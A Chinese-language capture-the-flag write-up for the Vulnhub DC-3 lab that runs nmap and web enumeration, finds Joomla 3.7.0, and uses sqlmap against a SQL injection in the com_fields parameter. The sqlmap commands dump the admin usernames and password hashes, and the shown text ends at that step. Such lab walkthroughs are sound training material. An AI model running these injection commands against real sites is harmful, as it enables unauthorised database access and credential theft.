【Vulhub靶场】 DC-3

DC-3靶场下载地址：************https://download.vulnhub.com/dc/DC-3-2.zip****************

目标

本机IP：192.168.118.128

靶机IP：192.168.118.0/24

信息收集

nmap扫描存活主机，扫描端口，扫描服务

nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.140

nmap -sV -A 192.168.118.140

第一步首先得出目ip为192.168.118.140

然后发现只开启一个80端口

访问web页面：http://192.168.118.140，发现一个登录页面

上面信息提示我们只有一个flag，很明显这次目标最终的获取root权限

除此之外，尝试这个登录页面，并没有什么卵用，也在没有了其他信息

web信息收集，使用whatweb工具查找web信息

bash 复制代码

whatweb http://192.168.118.140

得出了一个CMS信息：Joomla

表面信息无从下手之后，我们用dirsearch扫一下目录看看。

bash 复制代码

dirsearch -u http://192.168.118.140

经过测试发现了两个重要的目录，/administrator/ 和 /README.txt

分别进去查看一下

http://192.168.118.140/administrator/，发现是一个后台登录页面

http://192.168.118.140/README.txt，找到里面有重要信息， CMS版本信息为Joomla 3.7

查询漏洞

bash 复制代码

searchsploit joomla 3.7.0

发现SQL注入漏洞，进去查看一下漏洞信息

bash 复制代码

searchsploit -x php/webapps/42033.txt

发现是一个CVE漏洞，后面也给出了利用方法

sqlmap

跑数据库

bash 复制代码

sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

选joomladb，跑表名

bash 复制代码

sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' --tables -p list[fullordering]

选 #__users，跑列名

bash 复制代码

sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' -T '#_users' --columns -p list[fullordering]

跑出账号密码

bash 复制代码

sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump -p list[fullordering]